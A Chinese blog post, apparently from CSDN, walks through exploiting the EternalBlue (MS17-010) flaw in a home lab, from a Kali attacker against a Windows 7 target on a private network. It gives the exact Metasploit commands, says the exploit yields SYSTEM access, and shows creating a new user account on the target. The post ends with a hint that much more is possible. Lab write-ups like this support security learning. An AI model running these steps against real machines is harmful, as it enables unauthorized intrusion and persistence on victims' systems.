永恒之蓝(ms17-010)漏洞利用

注:ms17-010是永恒之蓝漏洞的编号

没有废话,直接实操吧

攻击机: ip: 192.168.10.30

操作系统:kali

靶机:ip: 192.168.10.32

操作系统:windows7

通过nessus扫描,确认靶机是存在永恒之蓝(ms17-010)漏洞的

第一步:

确认连通性(可以ping通)

第二步:

打开kali中的msf工具

直接点击即可运行,需输入root密码

第三步:

输入search  ms17-010搜索与ms17-010(永恒之蓝)漏洞相关的模块

第四步:

我们本次使用exploit/windows/smb/ms17_010_eternalblue模块(第一个模块)

依次输入

use  exploit/windows/smb/ms17_010_eternalblue(use 加模块名)

set  rhosts  192.168.10.32(set  rhosts  加ip地址)

exploit(执行)

以上三条命令为msf工具的固定语法

(如果弹出一大堆文字出来就说明已经入侵成功了,如果显示错误就试试其他几个模块)

此时在靶机上通过netstat命令可以看到多了一个连接

此时就可以在攻击机(kali)上对靶机进行操作了(入侵成功之后直接就是系统权限),例如通过shell命令进入靶机的命令行

我们可以创建一个名为zxk的账户(我这里靶机是中文,kali没有中文插件,所以显示是乱码)

此时靶机上多了一个用户

由于是系统权限,所以后面能够做什么事,懂的都懂 =-=!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值